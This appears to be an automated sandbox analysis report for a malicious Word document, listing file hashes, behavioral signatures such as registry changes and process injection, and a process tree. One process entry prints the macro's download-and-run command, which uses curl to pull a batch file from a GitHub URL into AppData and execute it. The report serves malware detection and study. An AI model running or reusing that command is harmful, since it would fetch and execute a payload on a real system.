Analysis

  • max time kernel
    122s
  • max time network
    123s
  • platform
    windows7_x64
  • resource
    win7-20240221-en
  • resource tags

    arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
  • submitted
    11-04-2024 01:15

General

  • Target

    4aadd3bf071f87781910766f30baa4ebc20d6c26485b21830cee76d4d8eb8b6d.doc

  • Size

    35KB

  • MD5

    582a41f1e6c7266f4473a396ed841261

  • SHA1

    0ac2b6ceb2ec13575b3b1448e72bc7958841b899

  • SHA256

    4aadd3bf071f87781910766f30baa4ebc20d6c26485b21830cee76d4d8eb8b6d

  • SHA512

    738e804dea2eaf95b4652958a9da042aa64bf39a0bb8a02101fbb9b03bc6867306d466122e96937112cdf11c96139a3a9a2fc82eb1d475be8c4629d4ed3b4b3c

  • SSDEEP

    192:wsWNslLZEvA+6/6r8px8SmvowzxeuQ9iBqyQYYTgN0j8ywc6tAHUkanRasQ:wC8iS8px8SMDen9BCUgN0jw/tgUkanj

Score
10/10

Malware Config

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 8 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\4aadd3bf071f87781910766f30baa4ebc20d6c26485b21830cee76d4d8eb8b6d.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2128
    • C:\Windows\SysWOW64\cmd.exe
      cmd /c curl https://raw.githubusercontent.com/NHTBOOT/1/main/pic.jpg --output %APPDATA%\Punn.bat && timeout 1 && start %APPDATA%\Punn.bat
      2⤵
      • Process spawned unexpected child process
      PID:2548
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2188

    Network

    MITRE ATT&CK Matrix ATT&CK v13

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm
      Filesize

      20KB

      MD5

      8c6a95cc6f30f08012ce3e433a8d0e81

      SHA1

      e3715f7e1034e608db4fc24a257b988913257a03

      SHA256

      82f73c79c5536dc2e3f4bea09f1f32d356eda5b1bf16083228c8ca2005faedd2

      SHA512

      8b4617d0b4f7975e5f5d6364b8356d1a84469f9e9b24508208c99b739181d346b05d51c048f69d0d4e1b3ec63202ded26c00d1d7824c8155b310247104ca96aa

    • memory/2128-0-0x000000002FE01000-0x000000002FE02000-memory.dmp
      Filesize

      4KB

    • memory/2128-1-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB

    • memory/2128-2-0x0000000070E4D000-0x0000000070E58000-memory.dmp
      Filesize

      44KB

    • memory/2128-7-0x00000000059B0000-0x0000000005AB0000-memory.dmp
      Filesize

      1024KB

    • memory/2128-14-0x0000000070E4D000-0x0000000070E58000-memory.dmp
      Filesize

      44KB

    • memory/2128-15-0x00000000059B0000-0x0000000005AB0000-memory.dmp
      Filesize

      1024KB

    • memory/2128-30-0x000000005FFF0000-0x0000000060000000-memory.dmp
      Filesize

      64KB